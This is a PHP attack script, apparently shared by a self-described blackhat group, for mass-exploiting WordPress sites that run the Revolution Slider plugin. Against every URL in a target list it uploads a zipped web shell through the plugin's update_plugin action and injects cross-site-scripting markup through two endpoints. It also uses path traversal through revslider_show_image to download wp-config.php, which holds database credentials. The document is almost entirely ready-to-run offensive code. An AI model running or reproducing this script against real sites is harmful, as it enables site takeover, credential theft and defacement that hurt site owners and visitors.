<?php/** me@dwisiswanto.my.id **//****************************************

1. <?php
2. /** me@dwisiswanto.my.id **/
3.  
4. /******************************************
5. First, install PHP CLI
6. USAGE: php exploit.php list-of-target.txt
7. ******************************************/
8.  
9. $cafc = array(
10. "file"=>"revslider.zip", // enter a ur shell file into a zip
11. "xss"=>"<marquee>CaFc Versace was Here", // for xss
12. "kfg"=>"..\wp-config.php" // for download config
13. );
14.  
15. function hajar($yuerel, $dataAing=null) {
16. $cuih = curl_init();
17. curl_setopt($cuih, CURLOPT_URL, $yuerel);
18. if ($dataAing != null){
19. curl_setopt($cuih, CURLOPT_POST, true);
20. curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
21. }
22. curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
23. curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
24. curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
25. $eks = curl_exec($cuih);
26. curl_close($cuih);
27. return $eks;
28. }
29.  
30. $site = @file_get_contents($argv[1]);
31. $tumbal = explode("\r\n", $site);
32. echo "Calculate the target list : " . count($tumbal);
33. if (!isset($site)) {
34. echo "Site N/A.";
35. } else {
36. foreach ($tumbal as $uri) {
37. echo "\n------------------------------------";
38. echo "\nTarget => " . $uri;
39. echo "\n";
40. $menta = hajar($uri . "/wp-admin/admin-ajax.php", array(
41. "action" => "revslider_ajax_action",
42. "client_action" => "update_plugin",
43. "update_file" => $cafc['file'])
44. );
45. $jason = json_decode($menta, true);
46. if ($jason['success'] == false || $jason['message'] == "Wrong request") {
47. echo "\nExploit [update_plugin] => NOT VULNERABLE";
48. } else {
49. echo "\nExploit [update_plugin] => SUCCESS";
50. echo "\n[+] " . $uri . "/wp-content/plugins/revslider/temp/update_extract/revslider/YOUR_FILE.php\n";
51. }
52.  
53. $menta2 = hajar($uri . "/wp-admin/admin-ajax.php", array(
54. "action" => "revslider_ajax_action",
55. "client_action" => "get_captions_css",
56. "data" => $cafc['xss'])
57. );
58. $jasonB = json_decode($menta2, true);
59. if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {
60. echo "\nExploit [get_captions_css] => NOT VULNERABLE";
61. } elseif ($jasonB['success'] == true) {
62. echo "\nExploit [get_captions_css] => SUCCESS";
63. echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
64. echo "action=revslider_ajax_action&";
65. echo "client_action=get_captions_css";
66. echo "data=" . urlencode($cafc['xss']) . "\n";
67. }
68.  
69. $menta3 = hajar($uri . "/wp-admin/admin-ajax.php", array(
70. "action" => "revslider_ajax_action",
71. "client_action" => $cafc['xss'])
72. );
73. $jasonC = json_decode($menta3, true);
74. if (preg_match("/wrong ajax action/i", $jasonC['message'])) {
75. echo "\nExploit [xss] => SUCCESS";
76. echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
77. echo "action=revslider_ajax_action";
78. echo "client_action=" . urlencode($cafc['xss']) . "\n";
79. } else {
80. echo "\nExploit [xss] => NOT VULNERABLE";
81. }
82.  
83. $menta4 = hajar($uri . "/wp-admin/admin-ajax.php", array(
84. "action" => "revslider_show_image",
85. "img" => $cafc['kfg']),
86. $uri);
87. if ($menta4 == "empty image" || $menta4 == "image file not found" || $menta4 == 0) {
88. echo "\nExploit [wp-config] => NOT VULNERABLE\n";
89. } else {
90. echo "\nExploit [wp-config] => SUCCESS";
91. echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
92. echo "action=revslider_show_image";
93. echo "img=" . $cafc['kfg'] . "\n";
94. }
95. }
96. }
97. ?>
98. -------------------------------------------------------------------------------------
99.  
100.  
101. # Credits :
102. -------------------------------------------------------------------------------------
103. CaFc Versace
104. Thanks : Agency CaFc - Surabaya BlackHat
105. -------------------------------------------------------------------------------------
106.  
107.  
108. ./learn to be better